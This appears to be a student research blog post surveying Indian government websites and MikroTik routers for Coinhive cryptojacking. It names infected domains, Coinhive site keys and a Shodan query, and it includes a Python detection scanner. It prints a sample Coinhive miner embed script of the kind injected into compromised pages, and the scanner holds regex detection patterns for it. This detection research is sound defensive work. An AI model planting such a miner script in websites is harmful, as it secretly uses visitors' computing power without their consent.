Cryptojacking and India: Government Websites Are Being Used to Mine Cryptocurrency, and Routers Are Used to Spread Cryptojacking Malware



Ever since Coinhive launched its service in September 2017, cryptojacking has become very popular (mostly for bad purposes). Earlier, people used to mine cryptocurrencies on their own hardware, but as the mining difficulty increased, so did the hardware requirements. Services like Coinhive gave people the power to use someone else's system to mine cryptocurrency and make money.

What Is Cryptojacking?


Cryptojacking is the secret use of a user's computing device to mine cryptocurrency. It used to be confined to the victim unknowingly installing a program that secretly mines cryptocurrency. In-browser cryptojacking doesn't need a program to be installed at all, which makes it more worrying.

In the last few months we saw a lot of news regarding cryptojacking. A few of them are:

1. Cryptojacking rates increased by 85 times in Q4 2017 as bitcoin prices spiked: report
2. Cryptocurrency Mining Malware Infected Over Half-Million PCs Using NSA Exploit

It is a new topic and not much research has been done on it, and since it helps hackers make money anonymously, a lot of hackers are into it.

As I am in my final year of Computer Science (undergraduate), together with two of my friends, Shakil Ahmed and Anisha Sharma, I decided to do research on the topic Cryptojacking: Its Detection and Prevention.

Before moving ahead with our research we wanted to do a small experiment to see whether Indian websites (mainly government websites) and systems are infected with cryptominers, and what the impact is.

The Experiment


Our first aim was to make a list of all the government websites of India and see if they are infected by cryptominers. We searched online for a list of government websites but did not find any, so we went to goidirectory.nic.in, which lists all government websites. From that website we got around 4,000+ Indian government websites.

The next step was to see if the websites have any cryptojacking scripts in them. Today there are many services which allow users to create an account and start using their cryptomining scripts. The most popular among them is CoinHive.com. So for our experiment we checked for "coinhive.min.js", the original Coinhive JavaScript library used in cryptojacking.

It was not a deep analysis: we only checked the HTML of the homepage of each website, so if the script was not present on the homepage we moved on to the next website. We skipped sub-domains too.

We found the following two websites infected by a cryptojacker:

1. http://cdma.ap.gov.in 

It is a subdomain of ap.gov.in, which has a global ranking of 2495 (Alexa). According to SimilarWeb, cdma.ap.gov.in gets more than 160k visits per month (Source). Since a lot of people visit the website, it is a perfect target for a hacker, as more views means more money.

cdma.ap.gov.in affected by cryptojacking


We did a reverse IP lookup on the website and found two more websites:

            a. tirupati.cdma.ap.gov.in
            b. http://macherla.cdma.ap.gov.in/

Both of them were infected by cryptojacking scripts.

2. http://www.ngcnalgonda.org

It is the website of Nagarjuna Government College, Nalgonda.


Here is what a Coinhive script looks like:

<script src="https://coin-hive.com/lib/coinhive.min.js"></script>
<script>
 var miner = new CoinHive.Anonymous('USER ID', {throttle: 0.3});
 // Only start on non-mobile devices and if not opted-out
 // in the last 14400 seconds (4 hours):
 if (!miner.isMobile() && !miner.didOptOut(14400)) {
  miner.start();
 }
</script>


In Coinhive each user has their own unique USER ID (the site key passed to the miner constructor), so we decided to dig further and see how many other websites were infected by the same person who infected the above-mentioned websites.

Here are the Coinhive USER IDs of the above websites:

1. http://cdma.ap.gov.in -- T9UtNcvcu9o197o4xvHWm49rC3Ba81QR
2. http://www.ngcnalgonda.org -- FEYZ3nALPTlIN0OtzyC78vPpTBYCJzde
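The two checks described above, looking for the coinhive.min.js loader in homepage HTML and pulling out the site key so that pages served by the same key can be grouped together, are shown below as an added Python example. This is not the tooling used in the experiment and not Coinhive's code; the hostnames and the EXAMPLEKEY placeholder key in the sample pages are constructed, and fetch_homepage is an assumed helper for a live run (the sample run is fully offline).

```python
import re
import urllib.request
from dataclasses import dataclass
from typing import Dict, List

# Loader tag for the Coinhive library. The library was served from both
# coinhive.com and coin-hive.com, so the hostname pattern accepts either.
COINHIVE_SCRIPT_RE = re.compile(
    r'<script[^>]*\bsrc\s*=\s*["\']https?://(?:www\.)?coin-?hive\.com/lib/coinhive\.min\.js["\']',
    re.IGNORECASE,
)

# Site key passed to the miner constructor, e.g.
#   new CoinHive.Anonymous('KEY', {throttle: 0.3})
# The keys in the post are 32 alphanumeric characters; the length bound is
# kept loose on the assumption that other lengths may exist.
COINHIVE_KEY_RE = re.compile(
    r'\bCoinHive\.(?:Anonymous|User)\(\s*["\']([A-Za-z0-9]{16,64})["\']'
)


@dataclass
class CoinhiveHit:
    script_present: bool   # loader <script> tag found
    site_keys: List[str]   # distinct keys handed to the miner, in page order


def find_coinhive(html: str) -> CoinhiveHit:
    """Inspect one page's HTML and report Coinhive indicators."""
    keys = list(dict.fromkeys(COINHIVE_KEY_RE.findall(html)))  # dedupe, keep order
    return CoinhiveHit(
        script_present=COINHIVE_SCRIPT_RE.search(html) is not None,
        site_keys=keys,
    )


def scan_pages(pages: Dict[str, str]) -> Dict[str, CoinhiveHit]:
    """Run find_coinhive over a mapping of hostname -> homepage HTML."""
    return {host: find_coinhive(html) for host, html in pages.items()}


def keys_to_hosts(scan: Dict[str, CoinhiveHit]) -> Dict[str, List[str]]:
    """Invert a scan: site key -> sorted hosts carrying that key.

    This is the local equivalent of the PublicWWW lookup: every host that
    shares a key is paying the same Coinhive account.
    """
    out: Dict[str, List[str]] = {}
    for host, hit in scan.items():
        for key in hit.site_keys:
            out.setdefault(key, []).append(host)
    return {key: sorted(hosts) for key, hosts in out.items()}


def fetch_homepage(host: str, timeout: float = 10.0) -> str:
    """Assumed helper for a live run: fetch http://<host>/ as text."""
    with urllib.request.urlopen(f"http://{host}/", timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


# Constructed sample pages; the key is a placeholder, not a real site key.
PLACEHOLDER_KEY = "EXAMPLEKEY" + "0" * 20 + "AA"
SAMPLE_PAGES = {
    "portal.example": f"""<html><head><title>Portal</title>
<script src="https://coin-hive.com/lib/coinhive.min.js"></script>
<script>
 var miner = new CoinHive.Anonymous('{PLACEHOLDER_KEY}', {{throttle: 0.3}});
 if (!miner.isMobile() && !miner.didOptOut(14400)) {{ miner.start(); }}
</script></head><body>Welcome</body></html>""",
    "clean.example": "<html><head><title>Clean</title></head><body>Nothing here</body></html>",
    "college.example": f"""<html><head>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>var m=new CoinHive.Anonymous("{PLACEHOLDER_KEY}");m.start();</script>
</head></html>""",
}

if __name__ == "__main__":
    results = scan_pages(SAMPLE_PAGES)
    for host, hit in results.items():
        print(host, hit)
    print(keys_to_hosts(results))
```

For a live run, replace SAMPLE_PAGES with {host: fetch_homepage(host) for host in hosts}; as in the experiment, only the homepage is inspected, so a miner injected on an inner page or on a sub-domain will not be seen.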

We used PublicWWW to see how many other websites were infected by these two users.

1. T9UtNcvcu9o197o4xvHWm49rC3Ba81QR  -- 36 Websites 
2. FEYZ3nALPTlIN0OtzyC78vPpTBYCJzde -- 49 Websites

From this experiment it is clear that hackers are now targeting government websites for mining cryptocurrency, as those websites get high traffic and most people trust them. Earlier we saw a lot of government websites getting defaced, but now injecting cryptojackers is the trend, as it makes money for the hacker.

After this experiment on government websites we tried to see if any Indian systems are affected by cryptojackers. A few days back we read the following news: Hackers Infect Over 200,000 MikroTik Routers With Crypto Mining Malware.

We used shodan.io to see how many routers are currently infected and where they are located. We used the following search query: http.component:"coinhive" product:"MikroTik http proxy"



To our surprise, India ranked second, with more than 13,500 routers affected by cryptojackers, which are spreading it further among users. Top cities include:

1. Raipur
2. Pune
3. Udaipur
4. Mumbai

Conclusion


Through our experiment we got to know that cryptojacking is spreading fast, as it is profitable and the majority of people are unaware of it and don't know how to prevent it. There was a time when hackers used to deface websites, and that was easy to detect. But now they simply add cryptojacking scripts to compromised websites, making it difficult for users and website owners to detect.

Support our research by donating ETH:

ETH Address : 0xDB6ec3eFD47EC5971FA05b13C8c159Eb2E2547BF